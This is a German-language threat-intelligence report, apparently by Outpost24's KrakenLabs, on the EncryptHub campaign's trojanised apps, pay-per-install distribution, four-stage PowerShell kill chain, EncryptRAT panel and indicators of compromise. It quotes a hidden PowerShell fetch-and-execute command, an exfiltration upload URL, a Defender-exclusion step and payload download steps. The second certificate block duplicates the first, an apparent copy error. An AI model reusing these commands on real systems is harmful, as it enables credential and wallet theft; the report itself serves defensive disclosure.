EncryptHub im Detail: Analyse einer mehrstufigen Malware-Kampagne  

EncryptHub, ist kürzlich ins Blickfeld mehrerer Threat-Intelligence-Teams gerückt, darunter auch KrakenLabs von Outpost24. Einige Reports haben bereits erste Einblicke in die Aktivitäten dieser Gruppe gewährt, doch unsere Untersuchung geht noch einen Schritt weiter: Unsere Analysten haben bisher unbekannte Bereiche der Infrastruktur, der Tools und Verhaltensmuster von EncryptHub aufdecken können. 

EncryptHub gab durch eine Reihe von Fehlern in der operativen Sicherheit (OPSEC) ungewollt kritische Elemente seines Ökosystems preis. Dank dieses Umstands konnten wir die Taktiken der Gruppe nun so detailliert wie nie zuvor erfassen. Fehler wie aktivierten Verzeichnislisten für wichtige Infrastrukturkomponenten über das Hosten von Stealer-Protokollen gemeinsam mit ausführbaren Malware-Dateien und PowerShell-Skripten bis hin zur Offenlegung von für die Datenexfiltration und Kampagnenverfolgung verwendeten Telegram-Bot-Konfigurationen.  

Dies ermöglichte uns einen einmaligen Einblick in die Machenschaften dieses Bedrohungsakteurs und gaben uns die Möglichkeit, seine Angriffskette und -methoden in einer öffentlich bisher noch nicht dagewesenen Weise zu untersuchen. 

In unserem ersten Teil des Berichts untersuchen wir die Taktik, die Infrastruktur und das Vorgehen von EncryptHub und legen den Umfang der Aktivitäten der Gruppe offen. Freuen Sie sich auf Teil 2, in dem wir noch mehr überraschende Details zu dieser gefährlichen Gruppe enthüllen werden. 

EncryptHub: Die Aktivitäten zusammengefasst 

  • Mehrstufige Angriffsketten: Die von EncryptHub durchgeführten Kampagnen setzen auf mehrere Schichten von PowerShell-Skripten, um Systemdaten zu sammeln, wertvolle Informationen abzuschöpfen, Gegenmaßnahmen zu umgehen, bösartige Nutzlasten (oft im Base64-Format eingebettet) zu platzieren und schließlich Info-Stealer einzusetzen. 
  • Verteilung: Es wurde beobachtet, dass EncryptHub es auf Benutzer beliebter Anwendungen abgesehen hat und dazu auf die Verbreitung von trojanisierten Versionen setzt. Darüber hinaus nutzt dieser Bedrohungsakteur auch Pay-Per-Install (PPI)-Dienste von Drittanbietern. 
  • Priorisierung von Zielen: Die Angreifer setzen ihre Prioritäten auf der Grundlage von Schlüsselattributen wie dem Besitz von Kryptowährungen, der Zugehörigkeit zu einem Unternehmensnetzwerk und der Verwendung von VPN-Software, die von den Systemen der Opfer gestohlen wurden. 
  • Diversifizierung in Vorbereitung: Der Bedrohungsakteur arbeitet an einem Produkt namens EncryptRAT, einem Remote-Access-Tool mit Command-and-Control-Panel (C2), das Infektionen mithilfe verschiedener Info Stealer und zusätzlicher Module verwalten kann. Es deutet einiges darauf hin, dass der Angreifer die Software in naher Zukunft verkaufen oder vertreiben will. 
  • Ausrichtung auf Schwachstellen: Allem Anschein nach verfolgt EncryptHub Entwicklungen im Bereich der Cybersicherheit aufmerksam und versucht, bekannte Sicherheitslücken in seinen Kampagnen zu nutzen.  
EncryptHubs Rautenmodell-Diagramm von Outpost24s KrakenLabs.
Abbildung 1: EncryptHubs Rautenmodell-Diagramm von Outpost24s KrakenLabs.

Vertriebskanäle und -taktiken 

EncryptHub testete und nutzte bisher eine Reihe von Methoden zur Verbreitung ihrer, ohne Alarme auszulösen oder dass die Opfer Verdacht schöpften. Sehen wir uns zunächst den klassischen Ansatz an, wie der Bedrohungsakteur mit trojanisierten Anwendungen, die als legitime Software getarnt waren, versuchte, Zugang zu den Systemen ahnungsloser Opfer zu erlangen. 

Danach gehen wir der Rolle einer neuartigen Vertriebsmethode nach, die sich in den letzten Jahren zunehmender Beliebtheit erfreut: der Einsatz von Drittanbietern über Plattformen wie LabInstalls. So können die Angreifer die Verbreitung von schädlichen Nutzlasten über automatisierte, kostenpflichtige Dienste optimieren.  

Trojanisierte Anwendungen 

EncryptHub wurde bei der Verbreitung gefälschter Versionen weit verbreiteter Anwendungen wie QQ Talk, QQ Installer, WeChat, DingTalk, VooV Meeting und Google Meet, Microsoft Visual Studio 2022 und Palo Alto Global Protect beobachtet. Der Bedrohungsakteur erstellt hierfür gefälschte, trojanisierte Versionen dieser Anwendungen und nutzt so das Vertrauen aus, das die Benutzer in diese beliebten Tools setzen. Die trojanisierten Anwendungen wurden zwischen dem 25. November 2024 und dem 1. Januar 2025 erstellt. 

Nach der Installation dieser trojanisierten Anwendungen fungieren sie als Übertragungsmechanismus für weitere bösartige Nutzlasten. Sie sorgen nicht nur für den anfänglichen Zugriff, sondern auch für erweiterte Privilegien und Persistenz und erleichtern so die laterale Bewegung im Netzwerk und dem Diebstahl von Daten. 

EncryptHub imitiert echte Anwendungsinstallationsprogramme, um den Verdacht der Benutzer zu mindern und umgeht so zudem einige automatische Sicherheitsüberprüfungen. Die so gefälschten Anwendungen erscheinen Nutzern vertraut und vertrauenswürdig – beides wichtige Faktoren für eine erfolgreiche Malware-Verbreitungskampagne.  

Screenshot der Phishing-Domain paloaltonworks[.]com, über die eine trojanisierte Version der Anwendung Palo Alto GlobalProtect installiert wurde. Das Bild erschien in einem mit EncryptHub-Kampagnen verbundenen Telegram-Kanal. 
Abbildung 2: Screenshot der Phishing-Domain paloaltonworks[.]com, über die eine trojanisierte Version der Anwendung Palo Alto GlobalProtect installiert wurde. Das Bild erschien in einem mit EncryptHub-Kampagnen verbundenen Telegram-Kanal. 

Alle trojanisierten Anwendungen, die wir analysiert haben, waren mit dem folgenden, bereits widerrufenen Code-Signatur-Zertifikat signiert: 

Name HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES COMPANY 
StatusDie Vertrauenswürdigkeit dieses Zertifikats oder eines der Zertifikate in der Zertifikatskette wurde widerrufen.
Aussteller  GlobalSign GCC R45 EV CodeSigning CA 2020 
Gültig ab  25/11/2024 1 h 54 
Gültig bis  26/11/2025 1 h 54 
Gültige Verwendung Code-Signierung 
Algorithmus sha256RSA 
ThumbprintA0CA753F0845B420E3F25E200B81D9936E731875 
Seriennummer 1F DB 22 03 07 68 A9 CF 31 F2 A9 6A 

In diese Anwendungen wurde ein PowerShell-Skript eingebettet, das die Datei worker.ps1 herunterlädt. Im Anschluss daran ruft worker.ps1 Systeminformationen ab, unter anderem externe IP-Adresse, Benutzername, Computername, Standort (Land und Stadt), Betriebssystemversion, Domainname, Build-Typ und Administratorstatus, und sendet die Daten über eine POST-Anforderung an den Remote-Server („http://[C2 server]:8080“) zurück.  

Unseren Beobachtungen zufolge verband sich das Skript mit encrypthub_steal.ps1, dessen enthaltene Zeichenfolgen darauf hindeuten, dass es sich wahrscheinlich um ein Kematian Stealer-Sample handelt. Ferner stellte es eine Verbindung mit dem PowerShell-Skript message.ps1 her, das Informationen über das System sammelt und an den Remote-Server sendet. 

Am 4. Februar 2025 begann der Bedrohungsakteur mit der Verwendung eines anderen Code-Signatur-Zertifikats: 

Name HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES COMPANY 
StatusDie Vertrauenswürdigkeit dieses Zertifikats oder eines der Zertifikate in der Zertifikatskette wurde widerrufen.
Aussteller  GlobalSign GCC R45 EV CodeSigning CA 2020 
Gültig ab  25/11/2024 1 h 54 
Gültig bis  26/11/2025 1 h 54 
Gültige Verwendung Code-Signierung 
Algorithmus sha256RSA 
ThumbprintA0CA753F0845B420E3F25E200B81D9936E731875 
Seriennummer 1F DB 22 03 07 68 A9 CF 31 F2 A9 6A 

Drittanbieterverteilung über LabInstalls 

Ein besonderes Element der Verbreitung von EncryptHub ist die Nutzung eines Drittanbieterdienstes mit der Bezeichnung LabInstalls seit mindestens dem 2. Januar 2025. LabInstalls agiert als Pay-per-Install (PPI) Broker für schädliche ausführbare Dateien (.exe) und PowerShell-Skripte (.ps1). Diese Plattform ist so konzipiert, dass sie Cyberkriminellen die Masseninstallation von Malware erleichtert und so eine schnelle Verbreitung von Malware ermöglicht. 

Im Rahmen des Dienstes wird ein vollautomatischer Telegram-Bot (@labInstalls_bot) eingesetzt, der die Kundeninteraktionen und den Kauf von Installationen verwaltet. 

Labinstalls_Bot Screenshot Header
Labinstalls_Bot Screenshot Details
Abbildung 3: Der Thread von Labinstalls im XSS-Underground-Forum, in dem Installationsdienste via Telegram-Bot zum Verkauf angeboten werden. 

EncryptHub hat tatsächlich bestätigt, Kunde von LabInstalls zu sein, indem es positive Rückmeldungen im Verkaufsthread des hochrangigen russischsprachigen Untergrundforums XSS hinterließ. Es wurde sogar ein Screenshot beigefügt, der die Nutzung des Dienstes beweist. Der Bedrohungsakteur hat diesen Dienst höchstwahrscheinlich engagiert, um die Verbreitung zu erleichtern und die Anzahl der Ziele zu erhöhen, die seine Malware erreichen kann. 

Mit Installationsdiensten optimieren sie die Verteilung bösartiger Installationsprogramme, automatisieren den Prozess und verbergen zugleich den bösartigen Ursprung der Daten. 

Abbildung 4. EncryptHubs positives Feedback als Kunde des Dienstes InstallsLab im russischsprachigen Untergrundforum XSS. 
Abbildung 4. EncryptHubs positives Feedback als Kunde des Dienstes InstallsLab im russischsprachigen Untergrundforum XSS. 

 EncryptHubs sich entwickelnde Killchain 

EncryptHub hat im Laufe der letzten Monate ständig experimentiert, optimiert und seine Killchain im Laufe der Zeit weiterentwickelt. Dieser Artikel konzentriert sich jedoch auf die aktuellste Version, die wir zum Zeitpunkt der Veröffentlichung dieses Artikels beobachtet haben und die um den 13. Februar 2025 eingesetzt wurde.  

Anhand dieser Killchain lässt sich die fortschreitende Strategie von EncryptHub veranschaulichen, die darauf abzielt, Malware in einem mehrstufigen Prozess zum Datendiebstahl einzusetzen. 

Die Schritte von EncryptHubs Killchain.
Abbildung 5.  Die Schritte von EncryptHubs Killchain.

Erstmalige Ausführung  

Der folgende Befehl wird auf dem Computer des Opfers ausgeführt: 

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command „Invoke-RestMethod -Uri ‚hxxps://encrypthub[.]us/encrypthub/fickle/payload.ps1‘ | Invoke-Expression“ 

Mit diesem Befehl wird payload.ps1 heruntergeladen, das mit der Build-ID des Angreifers (in diesem Fall encrypthub) personalisiert ist. 

Phase 1 – payload.ps1  

Hash: 90b7b711f56f00a1fa08a7a29f2cd8602b8aa1a0d78986dbfc9f64e38ac6cecd 

payload.ps1 ist für den Diebstahl vertraulicher Daten verantwortlich. Die Funktionsweise des Skripts lässt sich wie folgt zusammenfassen: 

  1. Instanzprüfung: Das Skript verifiziert zunächst, ob auf dem Computer des Opfers bereits eine andere Instanz aktiv ist. Wird keine Instanz gefunden, fährt es fort. 
  1. Datenexfiltration: 
  • Messaging-Sessions: Beschränkt auf Telegram. 
  • Krypto-Wallets: Ziel sind sowohl Browser- als auch Desktop-Wallets. 
  • Passwortmanager-Dateien: Aus Browsern und Plugins extrahiert. 
  • Dateien: Mit bestimmten Erweiterungen und bestimmten Schlüsselwörtern. 
  • VPN-Sessions: (Im Moment nur solche, die mit PaloAltoGP verbunden sind.) 
  1. Erfassung von Systeminformationen: Das Skript sammelt allgemeine Systeminformationen (z. B. Windows-Version, CPU, GPU) und versucht, installierte Antiviren-Software zu erkennen. 
  1. Cookie-Diebstahl: Ein eingebettetes, base64-kodiertes ausführbares Programm zum Sammeln von Browser-Cookies wird entschlüsselt und ausgeführt. Hierbei handelt es sich um die Go-Version von Kematian Stealer, die auf Github verfügbar ist. 
  1. Speicherung und Exfiltration von Daten: Die gestohlenen Daten werden in einem Verzeichnis innerhalb des temporären Ordners gespeichert. Nach Abschluss der Datensammlung: 
  1. Das Skript löscht leere Unterverzeichnisse. 
  2. Es komprimiert die gesammelten Daten und sendet sie an: 

    $($serveruri):8081/upload_file?filename=$base64FileName&buildType=$base64BuildType 

    wobei $serveruri in diesem Fall encrypthub[.]us ist. 

    1. Bericht 
      Das Skript ermittelt die Anzahl der gestohlenen Cookies, Passwörter, Wallets und E-Mails und sendet diese Daten dann zusammen mit Systeminformationen an $($serveruri):8081. Nach dem Abschluss des Berichts wird das temporäre Verzeichnis gelöscht. 
    1. Ausführung der Sekundärnutzlast 
      Zum Schluss lädt das Skript ein weiteres Skript von folgender Adresse herunter und führt es aus: 

    $($serveruri)/$build/ram/runner.ps1 

    Die Datei wird unter einem zufällig generierten Namen gespeichert und dann ausgeführt. 

    Phase 2 – runner.ps1 

    Hash: 1bce694f9f811982eb01d381a69cdd56c3fa81d113e41b5acb902ec66ec942b1 

    runner.ps1 wird mit dem folgenden Befehl ausgeführt: 

    powershell.exe -ArgumentList „-ExecutionPolicy Bypass -NoProfile -File `“$downloadPath`““ -WindowStyle Hidden 
     

    Das Skript enthält zwei base64-kodierte .msc-Dateien. Bei MSC-Dateien (Microsoft Common Console Documents) handelt es sich um XML-basierte Snap-In-Steuerdateien, die in Verbindung mit der Microsoft Management Console (MMC) für administrative Aufgaben verwendet werden. 

    Die von runner.ps1 durchgeführten Aktionen umfassen: 

    1. Dekodierung und Speicherung 
    • Es dekodiert alle MSC-Dateien. 
    • Es speichert sie in zwei im aktuellen Verzeichnis angelegten Unterordnern. 
    1. Änderung und Ausführung 
    • Es ändert eine der MSC-Dateien, um die URL hxxps://encrypthub[.]us/encrypthub/ram/ einzubetten. 
    • Das Skript startet die unveränderte MSC-Datei, die ihrerseits die geänderte Version ausführt. 
    • Die veränderte Datei nutzt ein Shockwave-Flash-Objekt eines ActiveX-Steuerelements und öffnet einen Webbrowser, um zur angegebenen URL zu navigieren. 
    1. Bereinigung 
    • Das Skript pausiert für 30 Sekunden. 
    • Es löscht alle erstellten Ordner vor dem Beenden. 

    Phase 3 – HTML-Loader 

    Innerhalb des unter hxxps://encrypthub[.]us/encrypthub/ram/ gehosteten Codes werden drei PowerShell-Befehle gestartet, die folgende Aktionen ausführen: 

    1. Ausnahme für das TEMP-Verzeichnis 
      Das Skript veranlasst Windows Defender, den TEMP-Ordner von seinen Scans auszuschließen. 
    1. Herunterladen und Ausführen eines sekundären Skripts 
      Ein weiteres Skript wird von folgender Adresse heruntergeladen und ausgeführt: 

    hxxps://encrypthub.us/encrypthub/ram/ram.ps1 

    1. Beendigung des MMC-Prozesses 
      Das Skript beendet den bei der Ausführung der MSC-Skripte gestarteten mmc-Prozess. 

    Phase 4 – Rhadamanthys-Einsatz  

    Hash: 411e6413afc5dadc63f69dd37d25f23dfee1fbd5eff1a591ba33dfc38ca5a4fd 

    ram.ps1 ist ein Minimalskript mit nur zwei Zeilen: 

    1. Herunterladen der ausführbaren Datei: Es lädt hxxps://encrypthub.us/encrypthub/ram/ram.exe (ein Beispiel von Rhadamanthys) herunter und legt es im TEMP-Ordner als transport.exe ab. 
    1. Ausführung: Das Skript führt transport.exe aus und wartet auf dessen Beendigung. 

    EncryptRAT-Panel 

    Im Zuge der Weiterentwicklung seiner Killchain entwickelte und verbesserte EncryptHub auch EncryptRAT, ein Command-and-Control (C2)-Panel, das EncryptHub zur Verwaltung von Infektionen einsetzt. Dieses Tool, das sich zum Zeitpunkt der Erstellung dieses Artikels noch in der Entwicklungsphase befindet, ermöglicht dem Angreifer Folgendes: 

    • Verwaltung aktiver Infektionen. 
    • Senden von Remote-Befehlen. 
    • Verwaltung von Zusatzmodulen. 
    • Überwachung und Download von Protokollen von infizierten Geräten. 
    • Konfiguration verschiedener Malware-Samples 
    • Konfiguration von Exfiltrationskanälen 

    Aus ersten Tests lässt sich erkennen, dass EncryptHub EncryptRAT möglicherweise bald kommerziell vermarkten und anderen Bedrohungsakteuren anbieten wird. Dies wird durch die Tatsache unterstrichen, dass die jüngsten Updates dieses Bedrohungsakteurs mehrere Benutzer unterstützen und mit BuildIDs verknüpfen. Diese wiederum sind mit den verschiedenen Samples verknüpft, sodass sowohl die Malware als auch die exfiltrierten Daten voneinander getrennt werden können.   

    Ansicht der Infektionsergebnisse
    Abbildung 6: Ansicht der Infektionsergebnisse
    Malware-Konfigurationspanel. 
    Abbildung 7: Malware-Konfigurationspanel. 

    Die wichtigsten Erkenntnisse 

    Unserer umfassenden Analyse von EncryptHub zufolge handelt es sich hierbei um einen finanziell motivierten Bedrohungsakteur mit einer mehrstufigen Angriffskette, die sowohl interne Tools als auch Vertriebskanäle von Drittanbietern nutzt. Ungeachtet seiner erheblichen Fehler im OPSEC-Bereich entwickelt EncryptHub seine Taktiken kontinuierlich weiter und macht damit deutlich, wie wichtig eine kontinuierliche Überwachung und proaktive Abwehrmaßnahmen sind. Organisationen sind gezwungen, wachsam zu bleiben und mehrstufige Sicherheitsstrategien einzusetzen, um die von solchen Angreifern ausgehenden Risiken zu minimieren. 

    Sie möchten wissen, ob es im Dark Web bereits Diskussionen über Ihre Organisation gibt? Ab sofort umfasst die EASM-Plattform (External Attack Surface Management) von Outpost24 ein Dark-Web-Modul, mit dem die Nutzer Zugang zu Bedrohungsinformationen erhalten, die von unseren Analysten aus dem KrakenLabs-Team, bereitgestellt werden. Kontaktieren Sie uns, um mehr zu erfahren. 

    Referenzen  

    Weitere Informationen finden Sie in der nachstehenden Liste von Referenzen anderer Cybersicherheitsunternehmen, die über die Aktivitäten von EncryptHub berichtet haben: 

    TTP 

    Ressourcenentwicklung 

    Stage-Fähigkeiten: Drive-by Target (T1608.004) 

    Anfänglicher Zugang 

    Ausnutzung von Remote-Diensten (T1210) 

    Ausführung 

    Befehls- und Scripting-Interpreter: PowerShell (T1059.001) 

    Verteidigungsumgehung 

    Verdeckte Dateien oder Informationen (T1027) 

    Beeinträchtigung der Verteidigung (T1562.001) 

    Zugang zu Anmeldedaten 

    Anmeldedaten aus Passwortspeichern (T1555.003) 

    Daten aus Informations-Repositories (T1213) 

    Erkennung 

    Erkennung von Systeminformationen (T1082) 

    Sammlung 

     Daten vom lokalen System (T1005) 

    Exfiltration 

    Exfiltration über Webservice (T1567.002) 

    Exfiltration über den Command-and-Control-Kanal (T1041) 

    Command and Control 

    Anwendungsschicht-Protokoll: Web-Protokoll (T1071.001) 

    Remote-Zugriffs-Tools (T1219) 

    Gefährdungsindikatoren (IOCs) 

    Verteilung (von EncryptHub LLC signierte Dateien) 

    532f4c9c72f1c77531a55f7811371aa65f85fc3a768d792482cab3381cdd29b3 (connect.exe) 

    4af6e5a266577ccc2dca9fcbe2f56a9673947f6f3b5b9d1d7eb740613fce80d4 (reCAPCHA.exe) 

    1661e8f8758526f913e4400af8dbfa7587794ba9345f299fa50373c7140e5819 (buzztalk_weaponised.exe) 

    f687fe9966f7a2cb6fdc344d62786958edc4a9d9b8389a0e2fea9907f90cfde2 (google-meets.exe) 

    Verteilung (von der HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES COMPANY signierte Dateien) 

    37bf1269a21cba22af239e734de043f1d08d61b44414bcf63b1b9198e6a8bc87 

    7d222bb62ae995479f05d4bddaa0b7d6dd7ade8d9c438214b00cc1d1be9b9db1 

    cc70570dd68a01ef43497c13ea7e5620256208b73bd1e4487f3bf0c91617169f 

    c5f07de4d69742b5a4492f87902c1907948149052a9522719b1f14ab3cb03515 

    cbb84155467087c4da2ec411463e4af379582bb742ce7009156756482868859c 

    725df91a9db2e077203d78b8bef95b8cf093e7d0ee2e7a4f55a30fe200c3bf8f 

    db3fe436f4eeb9c20dc206af3dfdff8454460ad80ef4bab03291528e3e0754ad 

    6b249d6421f4c8c04ca11febb0244f333aa49ca6a28feee62b7c681960a86ad5 

    5588d1c5901d61bb09cd2fc86d523e2ccbc35a0565fd63c73b62757ac2ee51f5 

    522fd6a56589f3ce764c88846006cca8c37ccbb286c6d2754ea979a59909271d 

    c124f307ffbfdba7190c0df9651e895c720962094a78a0af347b2f1e7a8962d0 

    Verwandte Dateien 

    21b99435d0cf1f9845feb795c83cbf9d10211e6bc26460f4cdcfcd57569054fe (worker.ps1)  

    381695385bde0f96ad93dcbab79b3fc40f84e497c0b6afd087d2f1a2fbf824c3 (encrypthub_steal.ps1)  

    9d9829ff50f5195ef4c1ebee6cf430c013ad47665657ef9a6c3bc0b9911a40c4  

    (message.ps1) 

    Phase 1 – payload.ps1 

    90b7b711f56f00a1fa08a7a29f2cd8602b8aa1a0d78986dbfc9f64e38ac6cecd 

    Eingebetteter Cookie Grabber (Kematian Stealer Go-Version) 

    Ecb7ee118b68b178e62b68a7e2aaee85bafc8b721cb9cee30d009a0c96e59cef 

    Phase 2 – runner.ps1 

    1bce694f9f811982eb01d381a69cdd56c3fa81d113e41b5acb902ec66ec942b1 (runner.ps1) 

    f2836437090bfb8ff878c9a8aee28e036adc4ad7c73a51623c5c6ff12445a741 (fake WmiMgmt.msc) 

    Phase 3 – HTML-Loader 

    07397a113756805501a3f73a027977011849a90053f2a966053711f442d21b8d 

    Phase 4 – Rhadamanthys-Einsatz  

    411e6413afc5dadc63f69dd37d25f23dfee1fbd5eff1a591ba33dfc38ca5a4fd (ram.ps1) 

    06628b0447c94dd270ecaf798bd052891cda386d504a20d439eb994004ff483c (ram.exe) 

    C2 Rhadamanthys 

    hxxps://85.234.100[.]177/b97c5970b3a1f0ccc/iwbsn37q.xl2a8 

    Weitere IOCs – abgerufen im Januar und Februar 2025 

    e4fc16fb36a5cd9e8d7dfe42482e111c7ce91467f6ac100a0e76740b491df2d4 (stealc.exe) 

    977198c47d5e7f049c468135f5bde776c20dcd40e8a2ed5adb7717c2c44be5b9 (nThread.dll) 

    fcfb94820cb2abbe80bdb491c98ede8e6cfa294fa8faf9bea09a9b9ceae35bf3 

    (CFF Explorer.exe) 

    Domains 

    concur.net[.]co 

    global-protect[.]net  

    global-protect[.]us 

    encrypthub[.]us 

    blackangel[.]dev 

    meets-gooie[.]com 

    fuckedserver[.]net 

    healthy-cleanse-fit[.]com 

    malwarehunterteam[.]net 

    353827-coinbase[.]com 

    paloaltonworks[.]com 

    conferx[.]live 

    b8-crypt0x[.]com 

    alphabit[.]vc 

    IPS 

    45.131.215[.]16 

    64.95.13[.]166 

    82.115.223[.]199 

    85.209.128[.]128 

    82.115.223[.]182 

    193.149.176[.]228 

    URL im Zusammenhang mit der Verwendung von LabInstalls 

    hxxp://31.41.244.11/files/5094364719/WClchuE.ps1 

    hxxp://31.41.244.11/files/5094364719/wclchue.ps1 

    hxxp://31.41.244.11/files/5094364719/T5NHWKA.ps1 

    hxxp://31.41.244.11/files/5094364719/RRFd0ev.ps1 

    hxxp://31.41.244.11/files/5094364719/wVjWGck.ps1 

    hxxp://185.215.113.39/files/5094364719/pcuy9xE.ps1 

    hxxp://31.41.244.11/files/5094364719/wvjwgck.ps1 

    hxxp://31.41.244.11/files/5094364719/rrfd0ev.ps1 

    hxxp://185.215.113.39/files/5094364719/fpEu4ir.ps1 

    hxxp://185.215.113.39/files/5094364719/RNsgUnN.ps1 

    hxxp://185.215.113.39/files/5094364719/7GVy9sB.ps1 

    hxxp://185.215.113.97/files/5094364719/LR8QUOU.ps1 

    About the Author

    KrakenLabs Threat Intelligence Team, Outpost24

    KrakenLabs ist das Cyber Threat Intelligence-Team von Outpost24. Unser Team hilft Unternehmen, Angreifern in der sich ständig weiterentwickelnden Bedrohungslandschaft einen Schritt voraus zu sein, und unterstützt Sie dabei, Ihre Assets, Systeme, Daten und Marken zu schützen. Mit einer umfassenden Threat-Hunting-Infrastruktur, Operative- und Structured Threat Intelligence deckt unsere TI-Lösung ein breites Spektrum an Bedrohungen auf dem Markt ab, um Ihre Organisation bei der Erkennung und Abwehr externer Gefahren zu unterstützen.